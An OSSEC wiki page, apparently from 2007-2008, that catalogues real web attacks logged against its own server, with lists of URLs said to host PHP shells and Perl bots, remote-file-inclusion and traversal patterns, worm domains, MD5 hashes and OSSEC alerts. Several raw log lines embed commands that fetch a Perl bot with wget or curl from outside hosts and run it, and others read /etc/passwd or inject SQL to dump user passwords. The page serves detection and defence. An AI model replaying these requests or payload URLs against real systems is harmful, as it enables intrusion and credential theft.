Navigation
Documentation

From OSSEC Wiki

Jump to: navigation, search

Contents

List of sites known to have Malicious php/perl scripts

Sites with PHP/Perl scripts

These are some of the sites that I have been collecting that have malicious php/perl
scripts used for web attacks (or related to trojans/worms).

Note: these sites may have malicious data. 

[PHP shell]
http://nicksom2d.sytes.net/ex/echo
http://www.thiaguinho.net/id.txt
http://nicksom2d.sytes.net/ex/echo
http://www.icaws.org/site//modules/Forums/admin/admin_forum
http://www.the-esao.com/imag/stringa.txt
http://paupal.info/folder/cmd1.gif
http://paupal.info/folder/mambo1.txt
http://xpls.my-place.us/57.txt
http://vegeta.co.jp/echo
http://www.gonfiabiligamespark.it/flash/r57.txt
http://l3to.by.ru/id.txt
http://efardella.cinet.it/claroline/phpbb/id.txt
http://www.freewebtown.com/sclipici/evilx
http://efardella.cinet.it/claroline/phpbb/id.txt
http://www.garotym.kit.net/cmd
http://koeh.t35.com/ptjz/root.gif
http://tw0team.name/leto/bn.txt
http://geocities.yahoo.com.br/google3089/cmd.html
http://tw0team.name/leto/kk.txt
http://legendlist.altervista.org/stringa.txt
http://usuarios.arnet.com.ar/larry123/id.txt
http://cristian-david.com/sphps/graba.txt
http://www.triton.xpg.com.br/id.txt
http://usuarios.lycos.es/poizonbox/r57.txt
http://www.visiontech-india.com/articles/images/logo2.jpg
http://mendesrs.bravehost.com/id.txt
http://intrusion.altervista.org/r0x/r0x/.../.../.../no.txt
http://intrusion.altervista.org/r0x/r0x/.../.../.../ddos.pl
http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../rox.txt
http://rpgnet.com/newrpgnet/intranet/cmd.txt
http://www.mendes1.igotfree.com/id.txt
http://www.houthandelpolak.nl/images/yello/.xpl/lila.jpg
http://badmus.by.ru/id.txt
http://usuarios.arnet.com.ar/larry123/safe.txt
http://h1.ripway.com/outside/rootlab.jpg
http://www.l1nuxgroup.by.ru/id.txt
http://teste21.t35.com/cmd/tool25.dat
http://148.245.107.2/.ssh/id.txt
http://148.245.107.2/.ssh/sela.txt
http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc????????
http://www.colorglo.it/oneadmin/calendar/.r/stringa.txt
http://www.jungo8949.co.kr/tool25.txt
http://triangle-uiuc.org/attack/zero.txt
http://www.athleticbaby.com/public/templates_c/paged.gif
http://intrusion.hut2.ru/.../.../.../hh.txt
http://intrusion.hut2.ru/.../.../.../metodi.txt
http://71.102.93.10/WTS/bin/hak/idpitbull.txt
http://www.envio-web.com/speedy/echo.txt
http://www.onlinebusan.com/user_img/gmaw0121/id.txt
http://www.waldemarnowakowski.com/chat/data/id.txt
http://www.talesh.info/niaz/logold.jpg
http://creation.g-nova.fr/asprofirst/x
http://www.tukangbecak.com/ban.gif
http://tristatetuners.com/projectlist/q-mono/safe.txt
http://zeeob.com/nuke/files/q-mono/safe.txt
http://www.spycorp-labs.com/echo.txt
http://www2.ferred.cl/modules/q-mono/safe.txt
http://www.mk-design.com.tw/phpMyVisites/safe.txt
http://www.scupank.org/c.txt
http://www.l1nx.com/friends/photos/gay.txt
http://www.madkiwi.org/genealogy/genlog.txt
http://www.geschoir.org/lukman/id.txt
http://www.injecteds.org/r57.txt
http://mastimagic.org/portal/modules/mx_tinies/includes/echo.txt
http://www.digitalcrocker.org/..%20/safe
http://coisas.mxbr.com.br/h/rootlab.jpg
http://mastimagic.org/portal/modules/mx_tinies/includes/echo.txt
http://agatsuma.bestfreewebspace.net/safe3
http://www.jungo8949.co.kr/tool25.txt
http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt
http://madinaedu.gov.sa/id2.txt
http://konfraternia.tarnow.pl/cutenews/data/.yop/safeon.txt
http://www.visitesantacatarina.com.br/banner/safeon.txt
http://216.191.16.12/.shell/site/hai.txt
http://216.191.16.12/.shell/site/iyes.txt


Common patterns (XSS)

/index2.php?x=<site>
/index.php?base_dir=<site>
/index.php?x=../../../../../../etc/passwd
/main.php?x=<site>
/error.php?dir=<site>
/main.inc&G_PATH=<site>
/htmltonuke.php?filnavn=<site>
/upgrade_album.php?GALLERY_BASEDIR=<site>
&mosConfig_absolute_path=<site>
/admin.php?cal_dir=<site>
/lib.inc.php?pm_path=<site>
/mainfile.php?MAIN_PATH=<site>
/contacts.php?cal_dir=<site>
/include.php?gorumDir=<site>
/step_one_tables.php?server_inc=<site>
/viewgantt.php?root_dir=<site>
/index.php?site=<site>
/index.php?content=<site>
/index.php?content=<any file>
/index.php?visualizar=<site>
/addevent.inc.php?agendax_path=<site>
/displayCategory.php?adminpath=<site>
/theme.php?THEME_DIR=<site>
/vw_usr_roles.php?baseDir=<site>
/initdb.php?absolute_path=<site>
/header.inc.php?serverPath=<site>
/start_lobby.php?CONFIG[MWCHAT_Libs]=<site>
/auth.php?path=<site>
.php?serverPath=<site>
onMouseOver=%22window.status='<site>
/index.php?arquivo=
/linkpoint.inc.php?config[root_dir]=<site>
/editsite.php?returnpath=<site>
/admin_xs.php?phpEx=/../../../../../../../../<file>%00
/db_connect.php?baseDir=<site>
/index.php?includeFooter=<site>
/addentry.php?phpbb_root_path=<site>
/addevent.inc.php?agendax_path=<location>
/index.php?AMG_open=comments&AMG_id=<sql_injection>
.php?dir=<site> (from setup.php?dir= print_category.php?dir= ask_password.php?dir=)
/db.php?path_local=<site>     -- PHP Loja Facil - [[http://www.milw0rm.com/exploits/3875]]


Dump of Web attack scripts

  • RFI Vulnerability scanner -
  • c99shell -
  • cmdphp_shell -
  • ShellBOT - http:// triangle-uiuc.org/attack/zero.txt
  • no.txt - http:// intrusion.altervista.org/r0x/r0x/.../.../.../no.txt
  • ddos.pl - http:// intrusion.altervista.org/r0x/r0x/.../.../.../ddos.pl
  • lila.jpg - http:// www.houthandelpolak.nl/images/yello/.xpl/lila.jpg
  • safe.txt - http:// usuarios.arnet.com.ar/larry123/safe.txt
  • id.txt - perlbot fetcher - http:// 148.245.107.2/.ssh/id.txt
  • sela.txt - perlbot - http:// 148.245.107.2/.ssh/sela.txt
  • asc - http:// wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc????????
  • mic22 - http:// www.envio-web.com/speedy/echo.txt


Broken scripts

  • Look at G_PATH=YOURCMD: 
65.98.14.194 - - [03/Oct/2007:15:47:25 -0300] "GET /wiki/index.php//install/index.php?lng=../../include/main.inc&G_PATH=YOURCMD? HTTP/1.1" 200 6539 "-" "libwww-perl/5.808"


Worm/Virus sites

[Sober trojan]
home.arcor.de
scifi.pages.at
home.pages.at
free.pages.at
people.freenet.de

[Hotword trojan]
ftp.targetdata.biz
ftp.alrobertspublishing.com
bp007.no-ip.com

[Warg Bot]
media.pixpond.com/l9rd


Full URLs

87.106.75.16 - - [12/Jul/2007:12:48:32 -0300] "GET /wiki/index.php//skin/zero_vote/error.php?dir=http://geocities.yahoo.com.br/google3089/cmd.html?&cmd=cd%20/tmp;lwp-download%20http://tw0team.name/leto/kk.txt;wget%20http://tw0team.name/leto/kk.txt;fetch%20http://tw0team.name/leto/kk.txt;curl%20-O%20http://tw0team.name/leto/kk.txt;perl%20kk.txt;rm%20-rf%20kk*? HTTP/1.1" 200 7024 "-" "libwww-perl/5.803"

213.251.187.110 - - [10/Jul/2007:05:00:57 -0300] "GET /dcid/install/index.php?lng=../../include/main.inc&G_PATH=http://legendlist.altervista.org/stringa.txt? HTTP/1.1" 200 6359 "-" "libwww-perl/5.803"

212.68.197.6 - - [10/Jul/2007:14:29:20 -0300] "GET //index.php?link=http://geocities.yahoo.com.br/google3089/cmd.html?&cmd=cd%20/tmp;lwp-download%20http://tw0team.name/x/bn.txt;wget%20http://tw0team.name/x/bn.txt;fetch%20http://tw0team.name/x/bn.txt;curl%20-O%20http://tw0team.name/x/bn.txt;perl%20bn.txt;rm%20-rf%20bn*? HTTP/1.1" 200 6235 "-" "libwww-perl/5.76"

216.120.227.52 - - [18/Jul/2007:07:55:43 -0300] "GET /dcid/*install/index.php?lng=../../include/main.inc&G_PATH=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 200 6361 "-" "libwww-perl/5.803"

212.184.187.186 - - [17/Jul/2007:17:28:19 -0300] "GET //install/index.php?lng=../../include/main.inc&G_PATH=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 200 6235 "-" "libwww-perl/5.63"

208.116.38.148 - - [17/Jul/2007:18:31:13 -0300] "GET //install/index.php?lng=../../include/main.inc&G_PATH=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 200 6235 "-" "libwww-perl/5.79"

201.17.129.24 - - [22/Jul/2007:21:46:26 -0300] "GET /install/index.php?lng=../../include/main.inc&G_PATH=http://usuarios.lycos.es/poizonbox/r57.txt?? HTTP/1.1" 200 6349 "-" "libwww-perl/5.803"

69.64.37.77 - - [21/Jul/2007:16:51:25 -0300] "GET /wiki/index.php?title=Samples_of_attac...ed_by_ossec&printable=yes/install/index.php?lng=../../include/main.inc&G_PATH=http://www.visiontech-india.com/articles/images/logo2.jpg? HTTP/1.1" 200 7063 "-" "libwww-perl/5.79"

62.141.39.43 - - [26/Jul/2007:10:14:16 -0300] "GET /wiki/index.php//install/index.php?lng=../../include/main.inc&G_PATH=http://mendesrs.bravehost.com/id.txt? HTTP/1.1" 200 6933 "-" "libwww-perl/5.76"

85.12.31.79 - - [26/Jul/2007:18:13:09 -0300] "GET /wiki/index.php/WebAttacks_links//skin/zero_vote/error.php?dir=http://intrusion.altervista.org/r0x/r0x/.../.../.../no.txt?? HTTP/1.1" 200 7197 "-" "libwww-perl/5.806"

216.120.237.150 - - [26/Jul/2007:19:37:43 -0300] "GET //skin/zero_vote/error.php?dir=http://intrusion.altervista.org/r0x/r0x/.../.../.../no.txt?? HTTP/1.1" 200 6235 "-" "libwww-perl/5.806"

66.156.76.235 - - [27/Jul/2007:00:12:18 -0300] "GET /wiki/index.php/RFI_Vulnerability_scanner//skin/zero_vote/error.php?dir=http://intrusion.altervista.org/r0x/r0x/.../.../.../no.txt?? HTTP/1.1" 200 7280 "-" "libwww-perl/5.76"

216.120.237.150 - - [28/Jul/2007:22:38:12 -0300] "GET /wiki/index.php//skin/zero_vote/error.php?dir=http://intrusion.altervista.org/r0x/r0x/.../.../.../no.txt?? HTTP/1.1" 200 7010 "-" "libwww-perl/5.806"

62.210.190.242 - - [28/Jul/2007:20:16:23 -0300] "GET /wiki/index.php?title=Index.php&printable=yes/*install/index.php?lng=../../include/main.inc&G_PATH=http://guilde-wow.nuxit.net/main? HTTP/1.1" 200 6762 "-" "libwww-perl/5.803"

216.200.125.254 - - [31/Jul/2007:22:01:12 -0300] "GET /htmltonuke.php?filnavn=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../no.txt? HTTP/1.1" 200 6291 "-" "libwww-perl/5.75"

216.200.125.254 - - [31/Jul/2007:22:16:20 -0300] "GET /wiki/index.php/htmltonuke.php?filnavn=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../no.txt? HTTP/1.1" 200 6884 "-" "libwww-perl/5.75"

216.200.125.254 - - [01/Aug/2007:11:12:28 -0300] "GET /wiki/index.php//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../no.txt? HTTP/1.1" 200 7120 "-" "libwww-perl/5.75"

69.14.231.114 - - [01/Aug/2007:18:32:00 -0300] "GET /wiki/index.php/main.php?x=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../rox.txt? HTTP/1.1" 200 6834 "-" "libwww-perl/5.79"

69.14.231.114 - - [01/Aug/2007:22:26:47 -0300] "GET /wiki/index.php/RFI_Vulnerability_scanner/default.php?page=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../zip.txt? HTTP/1.1" 200 7153 "-" "libwww-perl/5.79"

86.109.164.220 - - [07/Aug/2007:15:01:59 -0300] "GET /wiki/index.php/RFI_Vulnerability_scanner/index.php?p=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 500 607 "-" "libwww-perl/5.79"

74.53.90.130 - - [07/Aug/2007:15:37:44 -0300] "GET /main.php?x=http://ankerz.phpnet.us/Qe3? HTTP/1.1" 500 607 "-" "libwww-perl/5.808"

209.216.253.180 - - [15/Aug/2007:15:47:04 -0300] "GET /dcid/?p=6/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache),500(webadmin),2522(psaserv)%0A? HTTP/1.1" 200 11307 "-" "libwww-perl/5.65"

72.22.90.110 - - [15/Aug/2007:03:31:09 -0300] "GET /wiki/index.php/main.php?page=uid=10004(unix)%20gid=10004(unix)%20groups=10004(unix)%0A? HTTP/1.1" 200 6440 "-" "libwww-perl/5.803"

217.160.21.98 - - [14/Aug/2007:19:55:18 -0300] "GET /wiki/index.php/RFI_%3Cwbr%20/%3EVulnerability_scanner//skin/zero_vote/error.php?dir=uid=30(wwwrun)%20gid=8(www)%20groups=8(www),2523(psaserv)%0A? HTTP/1.1" 200 6117 "-" "libwww-perl/5.803"

218.38.19.40 - - [27/Aug/2007:20:07:45 -0300] "GET /ossec-list/2007-April/msg00052.html/index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 307 "-" "libwww-perl/5.79"

218.38.19.40 - - [27/Aug/2007:20:07:02 -0300] "GET /wiki/admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"

202.67.153.151 - - [26/Aug/2007:21:55:23 -0300] "GET /wiki/admin.php?cal_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"

202.67.153.151 - - [26/Aug/2007:21:55:22 -0300] "GET /admin.php?cal_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.803"

202.67.153.151 - - [28/Aug/2007:20:48:40 -0300] "GET /wiki/modules/tasks/viewgantt.php?root_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 293 "-" "libwww-perl/5.803"

212.59.7.10 - - [29/Aug/2007:09:37:44 -0300] "GET /wiki/index.php/WebAttacks_links/index.php?lng=../../include/main.inc&G_PATH=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 200 6638 "-" "libwww-perl/5.65"

82.165.33.50 - - [05/Sep/2007:11:44:12 -0300] "GET /main.php?x=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 269 "-" "libwww-perl/5.69"

204.10.70.1 - - [07/Sep/2007:15:54:13 -0300] "GET /wiki/index.php/install/index.php?lng=../../include/main.inc&G_PATH=http://www.colorglo.it/oneadmin/calendar/.r/stringa.txt? HTTP/1.1" 200 6539 "-" "libwww-perl/5.65"

206.176.210.52 - - [07/Sep/2007:14:21:22 -0300] "GET /wiki/index.php/index.php?site=http://www.jungo8949.co.kr/tool25.txt?&cmd=cd%20/tmp;rm%20-rf%20*;cd%20/tmp;lwp-download%20http://triangle-uiuc.org/attack/zero.txt;fetch%20http://triangle-uiuc.org/attack/zero.txt;curl%20-o%20zero.txt%20http://triangle-uiuc.org/attack/zero.txt;wget%20http://triangle-uiuc.org/attack/zero.txt;perl%20zero.txt? HTTP/1.1" 200 6272 "-" "libwww-perl/5.65"

128.241.236.252 - - [09/Sep/2007:13:16:29 -0300] "GET /wiki/index.php/install/index.php?lng=../../include/main.inc&G_PATH=http://www.athleticbaby.com/public/templates_c/paged.gif? HTTP/1.1" 200 6539 "-" "libwww-perl/5.808"

128.241.236.252 - - [09/Sep/2007:13:28:33 -0300] "GET /wiki/index.php/OSSECWUI:Install/install/index.php?lng=../../include/main.inc&G_PATH=http://www.athleticbaby.com/public/templates_c/paged.gif? HTTP/1.1" 200 6726 "-" "libwww-perl/5.808"

209.240.96.35 - - [17/Sep/2007:13:51:52 -0300] "GET /wiki/index.php?content=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 200 11992 "-" "libwww-perl/5.805"

200.142.86.12 - - [14/Sep/2007:12:36:42 -0300] "GET /wiki/index.php//modules/agendax/addevent.inc.php?agendax_path=http://intrusion.hut2.ru/.../.../.../metodi.txt?? HTTP/1.1" 200 6704 "-" "libwww-perl/5.65"

81.169.128.26 - - [03/Oct/2007:03:44:22 -0300] "GET /wiki/index.php?x=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 200 11992 "-" "libwww-perl/5.69"

210.114.220.92 - - [04/Oct/2007:00:29:38 -0300] "GET /wiki/index.php/install/index.php?lng=../../include/main.inc&G_PATH=http://www.onlinebusan.com/user_img/gmaw0121/id.txt? HTTP/1.1" 200 6539 "-" "libwww-perl/5.79"

202.133.244.140 - - [18/Sep/2007:17:08:46 -0300] "GET /wiki/index.php//hpgprojects/modules/admin/vw_usr_roles.php?baseDir='http://www.mk-design.com.tw/phpMyVisites/safe.txt? HTTP/1.1" 200 6814 "-" "libwww-perl/5.79"

69.72.144.66 - - [12/Oct/2007:02:09:24 -0300] "GET /wiki/calendar/events/header.inc.php?serverPath=http://mastimagic.org/portal/modules/mx_tinies/includes/echo.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.808"

211.233.6.126 - - [13/Oct/2007:02:59:25 -0300] "GET /main.php?x=http://www.digitalcrocker.org/..%20/safe? HTTP/1.1" 404 269 "-" "libwww-perl/5.65"

207.58.166.142 - - [15/Oct/2007:12:47:45 -0200] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://coisas.mxbr.com.br/h/rootlab.jpg?? HTTP/1.1" 404 296 "-" "libwww-perl/5.808"

209.62.7.50 - - [14/Oct/2007:15:02:01 -0200] "GET /ossec-list/index2.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 282 "-" "libwww-perl/5.808"

85.13.133.246 - - [13/Oct/2007:20:59:27 -0300] "GET /wiki/index.php/RFI_Vulnerability_scanner/index.php?page=http://www.jungo8949.co.kr/tool25.txt?&cmd=cd%20/tmp;rm%20-rf%20foi*;wget%20http://infos157.t35.com/foi.txt;cd%20/tmp;lwp-download%20http://infos157.t35.com/foi.txt;cd%20/tmp;fetch%20http://infos157.t35.com/foi.txt;cd%20/tmp;curl%20-o%20foi.txt%20http://infos157.t35.com/foi.txt;cd%20/tmp;GET%20http://infos157.t35.com/foi.txt;cd%20/tmp;lynx%20-source%20http://infos157.t35.com/foi.txt;cd%20/tmp;perl%20foi.txt;rm%20-rf%20foi.txt*? HTTP/1.1" 200 6721 "-" "libwww-perl/5.65"re>

87.106.11.23 - - [21/Apr/2008:10:47:13 -0300] "GET /wiki/index.php/index.php?AMG_open=comments&AMG_id=null+UNION+SELECT+1,2,3,concat_ws(0x203a20,user_name,user_password,user_email)1'AND%201=1/* HTTP/1.1" 200 6381 "-" "libwww-perl/5.803"

===MD5sum of web exploits===


Just a list of md5 checkums of tools/scritps I have being collecting:


<pre>
ac2d86274c237347746d100a74c98868
6ca575aa6e202c511fc3751ac833b931
d9faa6331644cc58a562ce04ab69dd46
db6b29c6644627c727190cdcc639765a
a42953bad0e0a9cb261ea8e29622481b
6a797404da403b219729c17dcd5cbcc1
3a900dff6ceac1f126d7d1d057f226a6
84a4c42ab78a5101d4ccd45302d77da0
2dc580046881289c6c061b9282fad9c8
d133dfda19beef529eed9d11e213a123
52c619a9d6e4079a8493ec6e2c4e0ef2
fd3c2a49fe6359b9073e1b54c5071f06
3ab294c6e48cc8bad2bcb066d2dc9985
48b3bd9fd9a7bdc36245afecbbe8d9b2
93b8be9f4c0d4bf8e8f063243f093dc2
ede8ad5d34499081f1358d22f331a62f
e454f994ad96271991bc8b402bce906e
ede8ad5d34499081f1358d22f331a62f
12b101965a4557cc876e78fcaf410f90
3793bcc32bd9cb46072bfc54d81708c2
2a1f293878fbcd048e443660ba29010d
08a2c6bd80eeee6dfd0e17d67c10015e
3921f2974e8c636863f60c39bba53533
723bd668815ab2081748ed6b80028f5a
3793bcc32bd9cb46072bfc54d81708c2
dfa7552638e2db710fea9ceb8c17b4f8


OSSEC alerts for web attacks

Simple Scan looking for multiple vulnerabilities

OSSEC HIDS Notification.
2007 Aug 27 20:07:47

Received From: teletubbies->/var/log/httpd/ossec.access.log
Rule: 31151 fired (level 10) -> "Mutiple web server 400 error codes from same source ip."
Portion of the log(s):

218.38.19.40 - - [27/Aug/2007:20:07:45 -0300] "GET /ossec-list/2007-April/msg00052.html/index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 307 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:07:02 -0300] "GET /wiki/admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:07:01 -0300] "GET /admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 281 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:07:00 -0300] "GET /wiki/admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:06:59 -0300] "GET /admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 281 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:06:37 -0300] "GET /ossec-list/2007-April/index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 293 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:06:32 -0300] "GET /index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:06:31 -0300] "GET /ossec-list/2007-April/msg00052.html/index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 307 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:06:20 -0300] "GET /wiki/upgrade_album.php?GALLERY_BASEDIR=http://badmus.by.ru/id.txt? HTTP/1.1" 404 283 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:06:16 -0300] "GET /wiki/upgrade_album.php?GALLERY_BASEDIR=http://badmus.by.ru/id.txt? HTTP/1.1" 404 283 "-" "libwww-perl/5.79"

Scan looking for vulnerable applications

OSSEC HIDS Notification.
2007 Oct 06 07:19:31

Received From: teletubbies->/var/log/httpd/access_log
Rule: 31151 fired (level 10) -> "Mutiple web server 400 error codes from same source ip."
Portion of the log(s):

91.121.27.102 - - [06/Oct/2007:07:19:30 -0300] "GET /phpMyChat-0.14.4//chat/messagesL.php3 HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:26 -0300] "GET /phpMyChat//chat/messagesL.php3 HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:26 -0300] "GET /phpMyChat-0.14.5//chat/messagesL.php3 HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:26 -0300] "GET /phpMyChat-0.14.2//chat/messagesL.php3 HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:26 -0300] "GET /php/phpmychat//chat/messagesL.php3 HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:25 -0300] "GET /forum//chat/messagesL.php3 HTTP/1.1" 404 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:25 -0300] "GET /chats//chat/messagesL.php3 HTTP/1.1" 404 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:25 -0300] "GET /chatroom//chat/messagesL.php3 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:25 -0300] "GET /PhpMyChat//chat/messagesL.php3 HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:24 -0300] "GET /phpchat//chat/messagesL.php3 HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"



 --END OF NOTIFICATION


SSEC HIDS Notification.
2007 Oct 06 08:06:55

Received From: teletubbies->/var/log/httpd/access_log
Rule: 31151 fired (level 10) -> "Mutiple web server 400 error codes from same source ip."
Portion of the log(s):

91.121.27.102 - - [06/Oct/2007:08:06:54 -0300] "GET //blogs/xmlrpc.php HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:54 -0300] "GET //community/xmlrpc.php HTTP/1.1" 404 282 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:54 -0300] "GET //drupal/xmlrpc.php HTTP/1.1" 404 279 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:42 -0300] "GET //phpadsnew2/adxmlrpc.php HTTP/1.1" 404 285 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:41 -0300] "GET //phpAdsNew2/adxmlrpc.php HTTP/1.1" 404 285 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:41 -0300] "GET //ads/adxmlrpc.php HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:41 -0300] "GET //Ads/adxmlrpc.php HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:41 -0300] "GET //phpads/adxmlrpc.php HTTP/1.1" 404 281 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:40 -0300] "GET //phpadsnew/adxmlrpc.php HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:40 -0300] "GET //phpAdsNew/adxmlrpc.php HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"



 --END OF NOTIFICATION
Retrieved from "http://www.ossec.net/wiki/WebAttacks_links"